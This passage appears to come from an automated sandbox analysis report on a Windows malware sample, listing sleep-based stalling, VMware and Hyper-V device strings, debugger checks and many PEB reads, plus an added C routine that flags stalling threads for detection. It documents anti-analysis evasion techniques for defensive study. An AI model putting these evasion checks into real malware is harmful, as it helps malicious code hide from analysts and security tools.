            (Sleep times below are NT relative timeouts: negative values are relative to now, and the numbers are in milliseconds despite the "s" suffix; the threshold is therefore 30 seconds cumulative per thread, and each flagged thread is sleeping in 2000 ms steps.)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe, TID 3676: Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, TID 3804: Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\explorer.exe, TID 6956: Thread sleep count: 9798 > 30
            Source: C:\Windows\explorer.exe, TID 6956: Thread sleep time: -19596000s >= -30000s
            Source: C:\Windows\explorer.exe, TID 6956: Thread sleep count: 143 > 30
            Source: C:\Windows\explorer.exe, TID 6956: Thread sleep time: -286000s >= -30000s
            Source: C:\Windows\SysWOW64\ipconfig.exe, TID 6188: Thread sleep count: 2024 > 30
            Source: C:\Windows\SysWOW64\ipconfig.exe, TID 6188: Thread sleep time: -4048000s >= -30000s
            Source: C:\Windows\SysWOW64\ipconfig.exe, TID 6188: Thread sleep count: 7945 > 30
            Source: C:\Windows\SysWOW64\ipconfig.exe, TID 6188: Thread sleep time: -15890000s >= -30000s
            Source: C:\Windows\SysWOW64\ipconfig.exe: Last function: Thread delayed (2 identical entries collapsed into one)
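The "Thread sleep count: N > 30" and "Thread sleep time: -T >= -30000" lines are per-thread aggregations of sleep calls. The following is an added example written for this page, not code from the report or from Joe Sandbox, showing how such accounting can be run over constructed sleep telemetry. Its assumptions are mine: timeouts arrive as NT relative times in milliseconds (negative means relative), the thresholds are 30 calls or 30 000 ms cumulative per thread, and a timeout of INT64_MAX / 10000 ms (the 922337203685477 value seen above) is an INFINITE wait that should not be counted as stalling. The sample events are constructed to mirror the explorer.exe and JHnNxt6Pnb.exe figures in the report.

```c
/* Added example, not code from the report or the sample: per-thread sleep
 * accounting of the kind behind the "Thread sleep count / Thread sleep
 * time" lines. Thresholds and the INFINITE sentinel are assumptions. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define INFINITE_WAIT_MS 922337203685477LL   /* INT64_MAX / 10000, i.e. an INFINITE wait */
#define COUNT_THRESHOLD  30                  /* assumed: more than 30 sleeps per thread */
#define TIME_THRESHOLD_MS 30000LL            /* assumed: 30 s cumulative per thread */

typedef struct { uint32_t tid; int64_t timeout_ms; } sleep_event;            /* one sleep/wait call */
typedef struct { uint32_t tid; uint32_t count; int64_t total_ms; } thread_stats;

/* Find the stats slot for a thread id, creating one if needed; NULL when full. */
static thread_stats *slot_for(thread_stats *st, size_t *n, size_t cap, uint32_t tid) {
    for (size_t i = 0; i < *n; i++)
        if (st[i].tid == tid) return &st[i];
    if (*n >= cap) return NULL;
    st[*n] = (thread_stats){ tid, 0, 0 };
    return &st[(*n)++];
}

/* Aggregate sleep calls per thread. NT relative timeouts are negative, so the
 * magnitude is taken. Infinite waits are blocking, not stalling, and are
 * skipped. Returns the number of distinct threads that were counted. */
size_t aggregate_sleeps(const sleep_event *ev, size_t n_ev, thread_stats *st, size_t cap) {
    size_t n = 0;
    for (size_t i = 0; i < n_ev; i++) {
        int64_t ms = ev[i].timeout_ms < 0 ? -ev[i].timeout_ms : ev[i].timeout_ms;
        if (ms >= INFINITE_WAIT_MS) continue;
        thread_stats *s = slot_for(st, &n, cap, ev[i].tid);
        if (!s) break;
        s->count++;
        s->total_ms += ms;
    }
    return n;
}

/* Verdict: a thread that sleeps more than COUNT_THRESHOLD times or for at
 * least TIME_THRESHOLD_MS in total is flagged as stalling the analysis. */
int thread_is_stalling(const thread_stats *s) {
    return s->count > COUNT_THRESHOLD || s->total_ms >= TIME_THRESHOLD_MS;
}

size_t count_stalling(const thread_stats *st, size_t n) {
    size_t k = 0;
    for (size_t i = 0; i < n; i++)
        if (thread_is_stalling(&st[i])) k++;
    return k;
}

/* Constructed telemetry: TID 6956 does 143 x 2000 ms (as explorer.exe above),
 * TID 3676 does one INFINITE wait (as JHnNxt6Pnb.exe above), TID 1111 sleeps
 * once for 5 s and should not be flagged. Returns the number of events. */
size_t build_sample(sleep_event *out, size_t cap) {
    size_t n = 0;
    for (int i = 0; i < 143 && n < cap; i++) out[n++] = (sleep_event){ 6956, -2000 };
    if (n < cap) out[n++] = (sleep_event){ 3676, -INFINITE_WAIT_MS };
    if (n < cap) out[n++] = (sleep_event){ 1111, -5000 };
    return n;
}

int main(void) {
    sleep_event ev[256];
    thread_stats st[64];
    size_t n_ev = build_sample(ev, 256);
    size_t n_th = aggregate_sleeps(ev, n_ev, st, 64);
    for (size_t i = 0; i < n_th; i++)
        printf("TID %u: %u sleeps, %lld ms total -> %s\n", st[i].tid, st[i].count,
               (long long)st[i].total_ms, thread_is_stalling(&st[i]) ? "STALLING" : "ok");
    return 0;
}
```

Sandboxes counter this pattern by accelerating or skipping sleeps, which is why the reported counts reach thousands within a single analysis run; an EDR applying the same thresholds on live telemetry should use the same INFINITE exclusion, otherwise every thread blocked on WaitForSingleObject would be flagged.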
            Source: explorer.exe, 00000006.00000003.2285166751.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005157734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp: binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
            Source: explorer.exe, 00000006.00000000.1543269548.0000000000A20000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmp: binary or memory string: NXTcaVMWare
            Source: explorer.exe, 00000006.00000000.1550468760.0000000009330000.00000004.00000001.00020000.00000000.sdmp: binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
            Source: explorer.exe, 00000006.00000000.1543269548.0000000000A20000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: VMware SATA CD00=
            Source: JHnNxt6Pnb.exe, 00000000.00000002.1538691770.0000000000E95000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmp: binary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp: binary or memory string: 6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&
            Source: explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp: binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000006.00000003.2285166751.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005157734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp: binary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000006.00000000.1543269548.0000000000A20000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000006.00000000.1550468760.0000000009330000.00000004.00000001.00020000.00000000.sdmp: binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.1543269548.0000000000A20000.00000004.00000020.00020000.00000000.sdmp: binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmp: binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            (These VMware and Hyper-V device identifiers were found in memory dumps of explorer.exe and of the sample, i.e. the analysis VM's own hardware IDs as enumerated by the shell and device stack. They show what a VM check could have read, not that the sample compared against them.)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Process queried: DebugPort (NtQueryInformationProcess with the ProcessDebugPort class, the check behind CheckRemoteDebuggerPresent)
            Source: C:\Windows\SysWOW64\ipconfig.exe: Process queried: DebugPort
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_00409AA0: rdtsc
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_0040ACE0: LdrLoadDll
            (In a 32-bit process fs:[00000030h] is the PEB pointer; reading it is the usual starting point for the BeingDebugged / NtGlobalFlag checks and for walking the loader module list to locate ntdll and kernel32 without an import table. Identical hits within one function are collapsed below with a count.)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019DA197: mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A9C188: mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A20185: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A84180: mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A6019F: mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01AB61E5: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A101F8: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01AA61C3: mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A5E1D0: mov eax, dword ptr fs:[00000030h] (4 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A10124: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A8E10E: mov eax, dword ptr fs:[00000030h] (6 occurrences); mov ecx, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A8A118: mov eax, dword ptr fs:[00000030h] (3 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01AA0115: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019E6154: mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019DC156: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A74144: mov eax, dword ptr fs:[00000030h] (4 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A78158: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A780A8: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01AA60B8: mov eax, dword ptr fs:[00000030h]; mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019E208A: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A660E0: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A220F0: mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019DC0F0: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019E80E9: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A620DE: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019DA0E3: mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019FE016: mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A76030: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A64000: mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A82000: mov eax, dword ptr fs:[00000030h] (8 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019DA020: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019DC020: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019E2050: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A0C073: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A66050: mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019D8397: mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019DE388: mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_01A0438F: mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019E83C0: mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_019EA3C0: mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA3C0 mov eax, dword ptr fs:[00000030h]4_2_019EA3C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA3C0 mov eax, dword ptr fs:[00000030h]4_2_019EA3C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA3C0 mov eax, dword ptr fs:[00000030h]4_2_019EA3C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A163FF mov eax, dword ptr fs:[00000030h]4_2_01A163FF
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9C3CD mov eax, dword ptr fs:[00000030h]4_2_01A9C3CD
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A663C0 mov eax, dword ptr fs:[00000030h]4_2_01A663C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE3F0 mov eax, dword ptr fs:[00000030h]4_2_019FE3F0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE3F0 mov eax, dword ptr fs:[00000030h]4_2_019FE3F0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019FE3F0 mov eax, dword ptr fs:[00000030h]4_2_019FE3F0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E3DB mov eax, dword ptr fs:[00000030h]4_2_01A8E3DB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E3DB mov eax, dword ptr fs:[00000030h]4_2_01A8E3DB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E3DB mov ecx, dword ptr fs:[00000030h]4_2_01A8E3DB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E3DB mov eax, dword ptr fs:[00000030h]4_2_01A8E3DB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A843D4 mov eax, dword ptr fs:[00000030h]4_2_01A843D4
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A843D4 mov eax, dword ptr fs:[00000030h]4_2_01A843D4
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DC310 mov ecx, dword ptr fs:[00000030h]4_2_019DC310
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A30B mov eax, dword ptr fs:[00000030h]4_2_01A1A30B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A30B mov eax, dword ptr fs:[00000030h]4_2_01A1A30B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A30B mov eax, dword ptr fs:[00000030h]4_2_01A1A30B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A00310 mov ecx, dword ptr fs:[00000030h]4_2_01A00310
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8437C mov eax, dword ptr fs:[00000030h]4_2_01A8437C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAA352 mov eax, dword ptr fs:[00000030h]4_2_01AAA352
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A88350 mov ecx, dword ptr fs:[00000030h]4_2_01A88350
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov eax, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov eax, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov eax, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov ecx, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov eax, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov eax, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov eax, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov ecx, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov eax, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov eax, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov eax, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov eax, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A60283 mov eax, dword ptr fs:[00000030h]4_2_01A60283
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A60283 mov eax, dword ptr fs:[00000030h]4_2_01A60283
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A60283 mov eax, dword ptr fs:[00000030h]4_2_01A60283
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E284 mov eax, dword ptr fs:[00000030h]4_2_01A1E284
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E284 mov eax, dword ptr fs:[00000030h]4_2_01A1E284
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F02A0 mov eax, dword ptr fs:[00000030h]4_2_019F02A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F02A0 mov eax, dword ptr fs:[00000030h]4_2_019F02A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA2C3 mov eax, dword ptr fs:[00000030h]4_2_019EA2C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA2C3 mov eax, dword ptr fs:[00000030h]4_2_019EA2C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA2C3 mov eax, dword ptr fs:[00000030h]4_2_019EA2C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA2C3 mov eax, dword ptr fs:[00000030h]4_2_019EA2C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA2C3 mov eax, dword ptr fs:[00000030h]4_2_019EA2C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F02E1 mov eax, dword ptr fs:[00000030h]4_2_019F02E1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F02E1 mov eax, dword ptr fs:[00000030h]4_2_019F02E1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F02E1 mov eax, dword ptr fs:[00000030h]4_2_019F02E1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D823B mov eax, dword ptr fs:[00000030h]4_2_019D823B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E6259 mov eax, dword ptr fs:[00000030h]4_2_019E6259
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DA250 mov eax, dword ptr fs:[00000030h]4_2_019DA250
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A68243 mov eax, dword ptr fs:[00000030h]4_2_01A68243
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A68243 mov ecx, dword ptr fs:[00000030h]4_2_01A68243
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D826B mov eax, dword ptr fs:[00000030h]4_2_019D826B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9A250 mov eax, dword ptr fs:[00000030h]4_2_01A9A250
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9A250 mov eax, dword ptr fs:[00000030h]4_2_01A9A250
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E4260 mov eax, dword ptr fs:[00000030h]4_2_019E4260
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E4260 mov eax, dword ptr fs:[00000030h]4_2_019E4260
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E4260 mov eax, dword ptr fs:[00000030h]4_2_019E4260
